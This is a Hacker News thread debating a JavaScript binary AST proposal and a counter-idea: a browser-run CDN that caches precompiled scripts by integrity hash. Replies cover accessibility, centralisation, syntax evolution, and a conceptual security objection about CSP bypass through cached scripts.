[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Hacker News new | past | comments | ask | show | jobs | submit login

One of my main concerns with this proposal, is the increasing complexity of what was once a very accessible web platform. You have this ever increasing tooling knowledge you need to develop, and with something like this it would certainly increase as "fast JS" would require you to know what a compiler is. Sure, a good counterpoint is that it may be incremental knowledge you can pick up, but I still think a no-work make everything faster solution would be better.

I believe there exists such a no-work alternative to the first-run problem, which I attempted to explain on Twitter, but its not really the greatest platform to do so, so I'll attempt to do so again here. Basically, given a script tag:

    <script src = "abc.com/script.js" integrity="sha256-123"></script>
A browser, such as Chrome, would kick off two requests, one to abc.com/script.js, and another to cdn.chrome.com/sha256-123/abc.com/script.js. The second request is for a pre-compiled and cached version of the script (the binary ast). If it doesn't exist yet, the cdn itself will download it, compile it, and cache it. For everyone except the first person to ever load this script, the second request returns before the time it takes for the first to finish + parse. Basically, the FIRST person to ever see this script online, takes the hit for everyone, since it alerts the "compile server" of its existence, afterwards its cached forever and fast for every other visitor on the web (that uses chrome). (I have later expanded on this to have interesting security additions as well -- there's a way this can be done such that the browser does the first compile and saves an encrypted version on the chrome cdn, such that google never sees the initial script and only people with access to the initial script can decrypt it). To clarify, this solution addresses the exact same concerns as the binary AST issue. The pros to this approach in my opinion are:

1. No extra work on the side of the developer. All the benefits described in the above article are just free without any new tooling.

2. It might actually be FASTER than the above example, since cdn.chrome.com may be way faster than wherever the user is hosting their binary AST.

3. The cdn can initially use the same sort of binary AST as the "compile result", but this gives the browser flexibility to do a full compile to JIT code instead, allowing different browsers to test different levels of compiles to cache globally.

4. This would be an excellent way to generate lots of data before deciding to create another public facing technology people have to learn - real world results have proven to be hard to predict in JS performance.

5. Much less complex to do things like dynamically assembling scripts (like for dynamic loading of SPA pages) - since the user doesn't also have to put a binary ast compiler in their pipeline: you get binary-ification for free.

The main con is that it makes browser development even harder to break into, since if this is done right it would be a large competitive advantage and requires a browser vendor to now host a cdn essentially. I don't think this is that big a deal given how hard it already is to get a new browser out there, and the advantages from getting browsers to compete on compile targets makes up for it in my opinion.




I don't think the binary AST proposal changes the accessibility status quo. In my mind, the best analogy is to gzip, Brotli, etc.

If you had to have a complicated toolchain to produce gzipped output to get the performance boost, that would create a performance gap between beginners and more experienced developers.

But today, almost every CDN worth its salt will automatically gzip your content because it's a stateless, static transformation that can be done on-demand and is easily cached. I don't see how going from JavaScript -> binary AST is any different.


I actually think gzip serves as a good example of this issue: this comment alone is daunting to a beginner programmer and it really shouldn't. This chrome/cdn thing could ALSO be auto-gzipping for you so that a beginner throwing files on a random server wouldn't need to know whether it supports gzip or not. I think we really take for granted the amount of stuff completely unrelated to programming we've now had to learn. If our goal is to make the web fast by default, I think we should aim for solutions that work by default.

It's definitely the case that once a technology (such as gzip) gets popular enough it can get to "by default"-feeling status: express can auto-gzip, you can imagine express auto-binary-ast-ing. It's slightly more complicated because you still need to rely on convention of where the binary-ast lives if you want to get around the dual script tag issue for older browsers that don't support binary ast yet (or I suppose have a header that specifies it support binary ast results for js files?). Similarly, at some point CDN's may also do this for you, but this assumes you know what a CDN is and can afford one. The goal I'm after is it would be nice to have improvements that work by default on day 1, not after they've disseminated enough. Additionally, I think its really dangerous to create performance-targeted standards this high in the stack (gzip pretty much makes everything faster, binary ast one kind of file, and introduces a "third" script target of the browser). The chrome/cdn solution means that firefox/cdn might try caching at a different level of compilation, meaning we get actual real world comparisons for a year before settling on a standard (if necessary at all).

Edit: another thing to take into account, is that it now becomes very difficult to add new syntax features to JavaScript, if its no longer just the browser that needs to support it, but also the version of the Binary AST compiler than your CDN is using.


The process of getting content on to the web has historically been pretty daunting, and is IMO much easier now than the bad old days when a .com domain cost $99/year and hosting files involved figuring out how to use an FTP client.

In comparison, services like Now from Zeit, Netlify, Surge, heck, even RunKit, make this stuff so much easier in comparison now. As long as the performance optimizations are something that can happen automatically with tools like these, and are reasonable to use yourself even if you want to configure your own server, I think that's a net win.

I do agree with you though that we ought to fight tooth and nail to keep the web as approachable a platform for new developers as it was when we were new to it.

On balance, I'm more comfortable with services abstracting this stuff, since new developers are likely to use those services anyway. That's particularly true if the alternative is giving Google even more centralized power, and worse, access to more information that proxying all of those AST files would allow them to snoop on.


This suggestion has a problem similar to the reason that browsers don't globally cache scripts based on integrity values: with your suggestion, if a domain temporarily hosts a .js file with a CSP-bypass vulnerability (ie. `eval(document.querySelector('.inline-javascript').textContent)` is a simple example; many popular javascript frameworks exist that do the equivalent of this), and then later removes it and starts using CSP, an attacker who knows an XSS vulnerability (which would otherwise be useless because of CSP) could inject a script tag with the integrity set equal to the CSP-vulnerable script that used to be hosted at the domain, and Chrome would find the script at the cdn.chrome.com cache.

(You might be thinking someone could set CSP to disable eval on their pages, but eval is reasonably safe even in the presence of otherwise-CSP-protected XSS attacks as long as you aren't using code that goes out of its way to eval things from the DOM, and it's more than annoying that the only way to protect yourself from this cache issue would be to disable eval. ... Also, there are some libraries that interpret script commands from the DOM without using eval, so disabling eval doesn't even protect you if you previously hosted one of those javascript files.)

You could have the cdn.chrome.com cache aggressively drop the cache of things greater than a certain amount of time like a day. But then there's a question of whether the requests to the cache are all just wasted bandwidth for the many requests by users to scripts that hadn't been loaded in a day. And the whole system means that website security can be dependent on cdn.chrome.com in some cases. I'd rather just build and host the processed binary AST myself. I already use a minifier; for most people, the binary AST tool would just replace their minifier.


Interesting idea, which could be built on top of the Binary AST.

I would personally prefer it being handled transparently by the middleware or the cdn, which would neatly separate the responsibilities between the browser, the cache+compressor and the http server.

Anyway, one of the reasons this project is only about a file format is so that we can have this kind of conversation about what the browsers and other tools can do once we have with a compressed JS file.


One of my fears about doing this at the CDN level is that now introducing a new syntax feature means you need the browser to support it AND the version of the Binary AST compiler on your CDN. Imagine using a new JS keyword and all of a sudden all your code gets slower because its a syntax error at the CDN level. It would just slower the rate of introduction of new syntax features I think by needing a lot more coordination: its already a bit messy with different browsers having different support, now caniuse.com may need to include CDN's too.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: